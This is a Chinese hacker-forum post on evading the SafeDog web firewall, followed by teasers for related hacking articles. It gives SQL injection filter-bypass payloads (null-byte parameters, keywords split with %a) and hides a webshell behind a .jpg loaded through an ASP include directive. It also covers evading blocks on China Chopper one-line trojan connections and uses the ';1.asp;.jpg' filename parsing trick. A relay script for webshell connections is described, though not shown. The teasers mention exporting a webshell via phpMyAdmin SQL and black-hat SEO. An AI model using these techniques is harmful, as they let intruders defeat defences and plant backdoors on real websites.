过安全狗技术总汇全集!!

hacker5年前黑客文章705
1.过注入
2.过大马被阻拦访问
3.过菜刀连接一句话被拦截
4.过1.asp;.jpg这样的文件
其他我没遇到了。。
现在一点一点讲:
1.过注入
*** 一:a.asp?aaa=%00&id=sql语句
*** 二: a.asp?id=sql语句   里面把安全过滤的加个%l 比如: un%aion sel%aect 1,2,3,4 fr%aom admin
2.过大马被阻拦访问
*** 一:上传一个大马 然后访问http://sss.com/dama.asp  访问后出现拦截。
那么解决 *** 先将dama.asp改名dama.jpg上传,然后在同目录上传个文件da.asp 内容为: <!–#include file=”dama.jpg” –>  这样再访问da.asp  就不会被拦截了。
3.过菜刀连接一句话被拦截
*** 一:不用菜刀连接一句话,用别的一句话连接端。
*** 二:中转下连接菜刀,把过滤掉的词替换掉。
4.过1.asp;.jpg这样的文件拦截
*** 一:;1.asp;.jpg
*** 二:保密
具体就为大家总结这么多了,安全狗 反正基本可以无视了!!
大家还有什么要补充的可以发在下面!
下面这个脚本是过安全狗连接菜刀用的 用法: 先把这个脚本放到个可执行.asp的目录
然后访问http://www.xx.com/asf.asp?dz=你要过的那个webshell地址
然后把地址输入进菜刀 密码还是你要过的那个webshell的密码 类型也是选择那个一句话木马的后缀类型
例如:http://www.xx.com/asf.asp?dz=http://xxx.com/yijuhua.php 密码
这样输入就菜刀

这个脚本暂时支持.php .aspx的一句话连接  .asp的可能还不行 没测试过。如果谁有装了安全狗的webshell可以告诉我下。我再测试下把这个脚本修改全面都支持!

标签: 黑客技术

相关文章

DedeCMS全版本通杀SQL注入漏洞利用代码及工具

dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近日,...

Keepassx是不是适用全部电脑操作系统?

Keepassx是不是适用全部电脑操作系统?

什么叫Keepassx? 针对安全性的本人数据库管理,KeepassX是一个十分高规定的客户的专用工具。KeePassX出示了一个用以建立安全性登陆密码的实用程序,密码生成器是高宽比可订制的,迅速的...

利用phpMyAdmin拿webshell

首先用暴路径漏洞找到绝对路径,然后替换下面的路径 随便选个数据库,然后执行以下的sql(利用sql命令导出一个shell) Create TABLE a (cmd text NOT N...

成为肉鸡后的自救方法_发现自己成为肉鸡怎样自救

成为肉鸡后的自救方法,我们一起分享。 一、正在上网的用户,发现异常应首先马上断开连接 如果你发现IE经常询问是你是否运行某些ActiveX控件,或是生成莫名其妙的文件、询问调试脚本什么...

伦理道德网络黑客和IT安全系数,那么学习培训Nmap是尤为重

伦理道德网络黑客和IT安全系数,那么学习培训Nmap是尤为重

什么叫Nmap? Nmap是IT观念上的“互联网映射器” - “互联网”的简称。您能够 将Nmap视作最知名的一个,事实上是最有效的黑客工具之一。期。假如您认真完成规化图,伦理道德网络黑客和IT安全...

黑帽往事:电影网站作弊提高排名日收入过万

黑帽往事:电影网站作弊提高排名日收入过万

一家黑帽电影网站,通过垃圾站+挂黑链方式,进行黑帽seo,从而提高百度排名,可实现日收入过万。这家黑帽作弊网站,实际是一家名为“碟民网”的电影网站,通过站长工具查询该网站的百度权重,可发现此网站的...